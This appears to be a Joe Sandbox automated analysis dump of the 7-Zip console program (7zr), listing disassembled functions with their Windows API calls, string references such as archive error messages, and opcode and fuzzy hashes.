                                              control_flow_graph 1565 cf6c72-cf6c8e call d8fb10 1568 cf6c96-cf6c9e 1565->1568 1569 cf6c90-cf6c94 1565->1569 1571 cf6ca6-cf6cae 1568->1571 1572 cf6ca0-cf6ca4 1568->1572 1569->1568 1570 cf6cd3-cf6cdc call cf8664 1569->1570 1578 cf6d87-cf6d92 call cf88c6 1570->1578 1579 cf6ce2-cf6d02 call cf67f0 call cf2f88 call cf87df 1570->1579 1571->1570 1574 cf6cb0-cf6cb5 1571->1574 1572->1570 1572->1571 1574->1570 1576 cf6cb7-cf6cce call cf67f0 call cf2f88 1574->1576 1591 cf715d-cf715f 1576->1591 1586 cf6f4c-cf6f62 call cf87fa 1578->1586 1587 cf6d98-cf6d9e 1578->1587 1604 cf6d4a-cf6d61 call cf7b41 1579->1604 1605 cf6d04-cf6d09 1579->1605 1599 cf6f67-cf6f74 call cf85e2 1586->1599 1600 cf6f64-cf6f66 1586->1600 1587->1586 1590 cf6da4-cf6dc7 call cf2e47 * 2 1587->1590 1612 cf6dc9-cf6dcf 1590->1612 1613 cf6dd4-cf6dda 1590->1613 1597 cf7118-cf7126 1591->1597 1614 cf6f76-cf6f7c 1599->1614 1615 cf6fd1-cf6fd8 1599->1615 1600->1599 1617 cf6d67-cf6d6b 1604->1617 1618 cf6d63-cf6d65 1604->1618 1605->1604 1609 cf6d0b-cf6d38 call cf9252 1605->1609 1609->1604 1624 cf6d3a-cf6d45 1609->1624 1612->1613 1619 cf6ddc-cf6def call cf2407 1613->1619 1620 cf6df1-cf6df9 call cf3221 1613->1620 1614->1615 1623 cf6f7e-cf6f8a call cf6bf5 1614->1623 1621 cf6fda-cf6fde 1615->1621 1622 cf6fe4-cf6feb 1615->1622 1626 cf6d6d-cf6d75 1617->1626 1627 cf6d78 1617->1627 1625 cf6d7a-cf6d82 call cf764c 1618->1625 1619->1620 1638 cf6dfe-cf6e0b call cf87df 1619->1638 1620->1638 1621->1622 1630 cf70e5-cf70ea call cf6868 1621->1630 1631 cf701d-cf7024 call cf8782 1622->1631 1632 cf6fed-cf6ff7 call cf6bf5 1622->1632 1623->1630 1641 cf6f90-cf6f93 1623->1641 1624->1591 1652 cf7116 1625->1652 1626->1627 1627->1625 1643 cf70ef-cf70f3 1630->1643 1631->1630 1649 cf702a-cf7035 1631->1649 1632->1630 1647 cf6ffd-cf7000 1632->1647 1654 cf6e0d-cf6e10 1638->1654 1655 cf6e43-cf6e50 call cf6c72 1638->1655 1641->1630 1648 cf6f99-cf6fb6 call cf67f0 call cf2f88 1641->1648 1650 cf710c 1643->1650 1651 cf70f5-cf70f7 1643->1651 1647->1630 1656 cf7006-cf701b call cf67f0 1647->1656 1685 cf6fb8-cf6fbd 1648->1685 1686 cf6fc2-cf6fc5 call cf717b 1648->1686 1649->1630 1658 cf703b-cf7044 call cf8578 1649->1658 1660 cf710e-cf7111 call cf6848 1650->1660 1651->1650 1659 cf70f9-cf7102 1651->1659 1652->1597 1661 cf6e1e-cf6e36 call cf67f0 1654->1661 1662 cf6e12-cf6e15 1654->1662 1680 cf6f3a-cf6f4b call cf1e40 * 2 1655->1680 1681 cf6e56 1655->1681 1676 cf6fca-cf6fcc 1656->1676 1658->1630 1679 cf704a-cf7054 call cf717b 1658->1679 1659->1650 1667 cf7104-cf7107 call cf717b 1659->1667 1660->1652 1683 cf6e58-cf6e7e call cf2f1c call cf2e04 1661->1683 1684 cf6e38-cf6e41 call cf2fec 1661->1684 1662->1655 1669 cf6e17-cf6e1c 1662->1669 1667->1650 1669->1655 1669->1661 1676->1660 1695 cf7056-cf705f call cf2f88 1679->1695 1696 cf7064-cf7097 call cf2e47 call cf1089 * 2 call cf6868 1679->1696 1680->1586 1681->1683 1703 cf6e83-cf6e99 call cf6bb5 1683->1703 1684->1683 1685->1686 1686->1676 1705 cf7155-cf7158 call cf6848 1695->1705 1727 cf70bf-cf70cc call cf6bf5 1696->1727 1728 cf7099-cf70af wcscmp 1696->1728 1711 cf6ecf-cf6ed1 1703->1711 1712 cf6e9b-cf6e9f 1703->1712 1705->1591 1717 cf6f09-cf6f35 call cf1e40 * 2 call cf6848 call cf1e40 * 2 1711->1717 1714 cf6ec7-cf6ec9 SetLastError 1712->1714 1715 cf6ea1-cf6eae call cf22bf 1712->1715 1714->1711 1724 cf6ed3-cf6ed9 1715->1724 1725 cf6eb0-cf6ec5 call cf1e40 call cf2e04 1715->1725 1717->1652 1729 cf6eec-cf6f07 call cf31e5 1724->1729 1730 cf6edb-cf6ee0 1724->1730 1725->1703 1742 cf70ce-cf70d1 1727->1742 1743 cf7129-cf7133 call cf67f0 1727->1743 1733 cf70bb 1728->1733 1734 cf70b1-cf70b6 1728->1734 1729->1717 1730->1729 1736 cf6ee2-cf6ee8 1730->1736 1733->1727 1740 cf7147-cf7154 call cf2f88 call cf1e40 1734->1740 1736->1729 1740->1705 1748 cf70d8-cf70e4 call cf1e40 1742->1748 1749 cf70d3-cf70d6 1742->1749 1759 cf713a 1743->1759 1760 cf7135-cf7138 1743->1760 1748->1630 1749->1743 1749->1748 1763 cf7141-cf7144 1759->1763 1760->1763 1763->1740
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00CF6C77
                                              • SetLastError.KERNEL32(00000002,-00000050,0000000F,-00000038,:$DATA,?,00000000,?), ref: 00CF6EC9
                                                • Part of subcall function 00CF6C72: wcscmp.MSVCRT ref: 00CF70A5
                                                • Part of subcall function 00CF6BF5: __EH_prolog.LIBCMT ref: 00CF6BFA
                                                • Part of subcall function 00CF6BF5: GetFileAttributesW.KERNEL32(?,?,?,00000000,?), ref: 00CF6C1A
                                                • Part of subcall function 00CF6BF5: GetFileAttributesW.KERNEL32(?,00000000,?,?,00000000,?), ref: 00CF6C49
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: AttributesFileH_prolog$ErrorLastwcscmp
                                              • String ID: :$DATA
                                              • API String ID: 3316598575-2587938151
                                              • Opcode ID: 2e5688116134fda9c0732df812e05706802453462e9dc37e215a0326dd7b1e21
                                              • Instruction ID: 0b2c63d5b421e6d9c399d2a56fccf43edfc75626ba37694e4ac42970a5abed2f
                                              • Opcode Fuzzy Hash: 2e5688116134fda9c0732df812e05706802453462e9dc37e215a0326dd7b1e21
                                              • Instruction Fuzzy Hash: C4E1253090020DDACFA5EFA4C895BFEB7B1EF14314F108219EA66672D1DB716A49DB13
                                              Function 00D06FC5 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 125COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D06FCA
                                                • Part of subcall function 00D06E71: __EH_prolog.LIBCMT ref: 00D06E76
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: Incorrect reparse stream$Unknown reparse stream$can't delete file
                                              • API String ID: 3519838083-394804653
                                              • Opcode ID: 687c72fbbe4478893bae5a9a09b6454f29700d5810e96fd20a5e3157fe659533
                                              • Instruction ID: 43c4722b6a4e418ba34e65fd7155b3eb8a982309e33948b67459e7dd3afe3ca4
                                              • Opcode Fuzzy Hash: 687c72fbbe4478893bae5a9a09b6454f29700d5810e96fd20a5e3157fe659533
                                              • Instruction Fuzzy Hash: 5041A272D092449BCF21DFA4C490BEEBBB5AF49340F58456EE08AA7281C631BE45C772
                                              Function 00D284A7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: fputs$H_prolog
                                              • String ID: =
                                              • API String ID: 2614055831-2525689732
                                              • Opcode ID: aeec65fe7ee49389c5da23e8902878224d579383ae4e9cf071c92b5a1f95d980
                                              • Instruction ID: c6cb39819b78b3257b8b364a29e6e2d758fbbc9d4547831e46445b1199f05771
                                              • Opcode Fuzzy Hash: aeec65fe7ee49389c5da23e8902878224d579383ae4e9cf071c92b5a1f95d980
                                              • Instruction Fuzzy Hash: D8218C32905118EBCF09EB94E952BEDBBB5EF58314F24002AE901B2191DF716E44EBA1
                                              Function 00D28341 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D28346
                                              • fputs.MSVCRT ref: 00D2835B
                                              • fputs.MSVCRT ref: 00D28364
                                                • Part of subcall function 00D283BF: __EH_prolog.LIBCMT ref: 00D283C4
                                                • Part of subcall function 00D283BF: fputs.MSVCRT ref: 00D28401
                                                • Part of subcall function 00D283BF: fputs.MSVCRT ref: 00D28437
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: fputs$H_prolog
                                              • String ID: =
                                              • API String ID: 2614055831-2525689732
                                              • Opcode ID: b42c943b8629621172c4a230f1e1321819de85ed4655c07efb40f5038c5e7704
                                              • Instruction ID: 24784ea6f2506c48e5a2cfeee6956bb03fda3fed03e140a2448e3a899f1d588a
                                              • Opcode Fuzzy Hash: b42c943b8629621172c4a230f1e1321819de85ed4655c07efb40f5038c5e7704
                                              • Instruction Fuzzy Hash: E901D631A00018EBCF05FBA4D812AFDBB75EF84714F00401AF901922A1CF754A55EBF2
                                              Function 00D87DA0 Relevance: 6.0, APIs: 4, Instructions: 38synchronizationCOMMON
                                              Download Yara Rule
                                              APIs
                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,?,00000000,00D0AB57), ref: 00D87DAA
                                              • GetLastError.KERNEL32(?,00000000,00D0AB57), ref: 00D87DBB
                                              • CloseHandle.KERNELBASE(00000000,?,00000000,00D0AB57), ref: 00D87DCF
                                              • GetLastError.KERNEL32(?,00000000,00D0AB57), ref: 00D87DD9
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: ErrorLast$CloseHandleObjectSingleWait
                                              • String ID:
                                              • API String ID: 1796208289-0
                                              • Opcode ID: 63a9db08ec86abf4bb733393fa0496c967f046f6d1b0d313dbaf9341a9e3134e
                                              • Instruction ID: 911d4ea2913f39d8a304ded1a69badc2380da2b5fe3f40b93e5713201fa5345b
                                              • Opcode Fuzzy Hash: 63a9db08ec86abf4bb733393fa0496c967f046f6d1b0d313dbaf9341a9e3134e
                                              • Instruction Fuzzy Hash: C3F0FE72308202D7EB207ABD9C84B367698AF523B4F380726E565D32E0EA64DC408730
                                              Function 00D12096 Relevance: 6.0, APIs: 1, Strings: 2, Instructions: 722COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D1209B
                                                • Part of subcall function 00CF757D: GetLastError.KERNEL32(00CFD14C), ref: 00CF757D
                                                • Part of subcall function 00D12C6C: __EH_prolog.LIBCMT ref: 00D12C71
                                                • Part of subcall function 00CF1E40: free.MSVCRT ref: 00CF1E44
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prolog$ErrorLastfree
                                              • String ID: Cannot find archive file$The item is a directory
                                              • API String ID: 683690243-1569138187
                                              • Opcode ID: a1f44c32a8b138fa1bc3f8b47b2ea25f816d9294e6926dafcfdae328c8f14455
                                              • Instruction ID: f2aa721f9fff36b64defc4b65c8a3b539b2fb44c5a43d0b4156403ec372b6b5b
                                              • Opcode Fuzzy Hash: a1f44c32a8b138fa1bc3f8b47b2ea25f816d9294e6926dafcfdae328c8f14455
                                              • Instruction Fuzzy Hash: 15725A74D00258EFCB25DF68D884BEDBBB1BF49300F184099E959A7252CB719E91CF61
                                              Function 00D2C911 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: CountTickfputs
                                              • String ID: .
                                              • API String ID: 290905099-4150638102
                                              • Opcode ID: 7d9600619c9ec1f144b26da18c68c4a5b1006a7f13ebfdac8a79dd63737fa659
                                              • Instruction ID: 3a847a76b5c3378966010215f00f4cadfa9e624ee1d1f4ada7d3d4b1a0a68c47
                                              • Opcode Fuzzy Hash: 7d9600619c9ec1f144b26da18c68c4a5b1006a7f13ebfdac8a79dd63737fa659
                                              • Instruction Fuzzy Hash: B3718A31610B189FCB61EF68D481AAEB7F6BF91308F14581DE58787681DB70BC49CB22
                                              Function 00D308B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00CF9C8F: GetModuleHandleA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 00CF9CB3
                                                • Part of subcall function 00CF9C8F: GetProcAddress.KERNEL32(00000000), ref: 00CF9CBA
                                                • Part of subcall function 00CF9C8F: GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 00CF9CC8
                                              • __aulldiv.LIBCMT ref: 00D3093F
                                              • __aulldiv.LIBCMT ref: 00D3094B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: __aulldiv$AddressGlobalHandleMemoryModuleProcStatus
                                              • String ID: 3333
                                              • API String ID: 3520896023-2924271548
                                              • Opcode ID: aa80bea9d6c22138b4e28b4c2bf2419a07f06abe99e39d7f84be716b64eca7ac
                                              • Instruction ID: 3861a832bcafe3ba538ca1fbfbbffebee1eb6749ad7fe58570993bd48897af3c
                                              • Opcode Fuzzy Hash: aa80bea9d6c22138b4e28b4c2bf2419a07f06abe99e39d7f84be716b64eca7ac
                                              • Instruction Fuzzy Hash: 4B21A9B19007046FE730EF6A8881B5FFAFDFB88750F04892EB186D3642D670A9408B75
                                              Function 00D1A7C5 Relevance: 5.1, APIs: 2, Strings: 1, Instructions: 606COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00CF1E40: free.MSVCRT ref: 00CF1E44
                                              • memset.MSVCRT ref: 00D1AEBA
                                              • memset.MSVCRT ref: 00D1AECD
                                                • Part of subcall function 00D304D2: _CxxThrowException.MSVCRT(?,00DA4A58), ref: 00D304F8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: memset$ExceptionThrowfree
                                              • String ID: Split
                                              • API String ID: 1404239998-1882502421
                                              • Opcode ID: d230823d2a567da97e6faee875237c09e0a999860d67595a19d4016e93e30e29
                                              • Instruction ID: 031cabdce243a42d689ac2e97e563832d139e4605a7d990c12a8ff28d2f91f9c
                                              • Opcode Fuzzy Hash: d230823d2a567da97e6faee875237c09e0a999860d67595a19d4016e93e30e29
                                              • Instruction Fuzzy Hash: D7427F74A05248EFDF25DBA8D984BEDB7B2BF05304F184099E449A7251CB31ADC5CF62
                                              Function 00CF759A Relevance: 4.6, APIs: 3, Instructions: 64fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00CF759F
                                                • Part of subcall function 00CF764C: CloseHandle.KERNELBASE(00000000,?,00CF75AF,00000002,?,00000000,00000000), ref: 00CF7657
                                              • CreateFileW.KERNELBASE(00000000,00000000,?,00000000,00000002,00000000,00000000,?,00000000,00000002,?,00000000,00000000), ref: 00CF75E5
                                              • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,00000000,?,00000000,00000002), ref: 00CF7626
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: CreateFile$CloseH_prologHandle
                                              • String ID:
                                              • API String ID: 449569272-0
                                              • Opcode ID: 1a0b344173804faf5411e42cef30d38cbfbc962498b5fc0b1fcad3a6b3ef2713
                                              • Instruction ID: b97edc4e73ba87ccd8806f338539c669502bc50102c9fc095c9916511830b201
                                              • Opcode Fuzzy Hash: 1a0b344173804faf5411e42cef30d38cbfbc962498b5fc0b1fcad3a6b3ef2713
                                              • Instruction Fuzzy Hash: 1D11877140020EEFCF519FA4DC418FEBB7AFF14354B108629FA60561A1C7319E65EB51
                                              Function 00D283BF Relevance: 4.6, APIs: 3, Instructions: 60COMMON
                                              Download Yara Rule
                                              APIs
                                              • fputs.MSVCRT ref: 00D28437
                                              • fputs.MSVCRT ref: 00D28401
                                                • Part of subcall function 00CF1FB3: __EH_prolog.LIBCMT ref: 00CF1FB8
                                              • __EH_prolog.LIBCMT ref: 00D283C4
                                                • Part of subcall function 00CF1FA0: fputc.MSVCRT ref: 00CF1FA7
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prologfputs$fputc
                                              • String ID:
                                              • API String ID: 678540050-0
                                              • Opcode ID: dafe19cec3f5734aa4b91b866ce541dd7da22bd34b49b77132630b8099787bb2
                                              • Instruction ID: 07cf81254583cb3d59519f461b66f8156e781cd279ba99a80a491c72c48c9ede
                                              • Opcode Fuzzy Hash: dafe19cec3f5734aa4b91b866ce541dd7da22bd34b49b77132630b8099787bb2
                                              • Instruction Fuzzy Hash: 3911A931B0411DDBCF09BBE4D8139BEBBB6DF40750F100029F60193291DF665945A6F6
                                              Function 00CF7731 Relevance: 4.6, APIs: 3, Instructions: 60COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetFilePointer.KERNELBASE(00000002,?,00000000,?,00000002,00000002,?,00000002,?,00CF77DB,?,?,00000000,?,00CF7832,?), ref: 00CF7773
                                              • GetLastError.KERNEL32(?,00CF77DB,?,?,00000000,?,00CF7832,?,?,?,?,00000000), ref: 00CF7780
                                              • SetLastError.KERNEL32(00000000,?,?,00CF77DB,?,?,00000000,?,00CF7832,?,?,?,?,00000000), ref: 00CF7797
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: ErrorLast$FilePointer
                                              • String ID:
                                              • API String ID: 1156039329-0
                                              • Opcode ID: ba0be7f34f473e68d6ed3bfe73638efff67d3f0b8980fd40a93ac4b9b4b81321
                                              • Instruction ID: 222e4e9273cfc7676e1cd42beb1fefecef814ae299905f67510a56d1ffdaa096
                                              • Opcode Fuzzy Hash: ba0be7f34f473e68d6ed3bfe73638efff67d3f0b8980fd40a93ac4b9b4b81321
                                              • Instruction Fuzzy Hash: C3110131610309AFEF16DF68DC45BAE37E5AF04320F10852AFA26D72A1D7B09E10DB61
                                              Function 00CF5A8C Relevance: 4.6, APIs: 3, Instructions: 54COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00CF5A91
                                              • SetFileAttributesW.KERNELBASE(?,?,?,?,00000000), ref: 00CF5AB7
                                              • SetFileAttributesW.KERNEL32(?,?,00000000,?,?,00000000), ref: 00CF5AEC
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: AttributesFile$H_prolog
                                              • String ID:
                                              • API String ID: 3790360811-0
                                              • Opcode ID: d8f235c869eac361efe40d53dc3eb88abd639fd10f051d69cedaad53cc6261ad
                                              • Instruction ID: 687e81489ca61300a17472b728e9cee9ec129bf430816433021b49edc0cdbc24
                                              • Opcode Fuzzy Hash: d8f235c869eac361efe40d53dc3eb88abd639fd10f051d69cedaad53cc6261ad
                                              • Instruction Fuzzy Hash: 6A01B532D0021DABCF55AFA59C816BEB775EF40350F144426EF21A3252CB368D15E662
                                              Function 00D25883 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 22COMMON
                                              Download Yara Rule
                                              APIs
                                              • EnterCriticalSection.KERNEL32(00DB2938), ref: 00D2588B
                                              • LeaveCriticalSection.KERNEL32(00DB2938), ref: 00D258BC
                                                • Part of subcall function 00D2C911: GetTickCount.KERNEL32 ref: 00D2C926
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: CriticalSection$CountEnterLeaveTick
                                              • String ID: v
                                              • API String ID: 1056156058-3261393531
                                              • Opcode ID: 766129c15d866ddf2e94303b0f4080a5788386ad3c7e72a1f2393df878fd9a6d
                                              • Instruction ID: c483fd3631e4b29e603dc569735ed0d532143a6de9ff222b036d89b4f37cba7b
                                              • Opcode Fuzzy Hash: 766129c15d866ddf2e94303b0f4080a5788386ad3c7e72a1f2393df878fd9a6d
                                              • Instruction Fuzzy Hash: DDE0C276615220DFC704DB18E909E9A77A5AFA8311F05156AE409C7362CB709D49CAB1
